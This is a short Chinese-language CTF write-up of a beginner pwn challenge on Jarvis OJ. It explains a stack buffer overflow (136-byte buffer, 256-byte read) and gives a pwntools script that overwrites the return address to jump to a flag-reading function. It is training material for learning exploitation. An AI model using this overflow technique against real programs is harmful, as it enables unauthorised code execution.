本来想做其他的平台,但是搜了一下还是这个平台比较适合入门。
题目
Wp
这里首先下载,然后ida打开,看到main函数
main函数说的实际上就是有一个保存的栈大小为136,但是确允许输入256栈大小的内容,这里存在栈溢出的问题。
然后这里可以看到有一个good_gaem
可以看到是读取了一个flag.txt的文件。
那么需要做的就是先覆盖,这里我自己感觉的是,覆盖先将自身拉满,然后加返回地址直接覆盖就行。
最后就是先覆盖136的自身,然后加上good_game的地址即可。
pwntools
from pwn import *
sh = remote("pwn.jarvisoj.com",9876)
data=136*'a'+p64(0x400620)
sh.sendline(data)
sh.interactive()
sh.close()
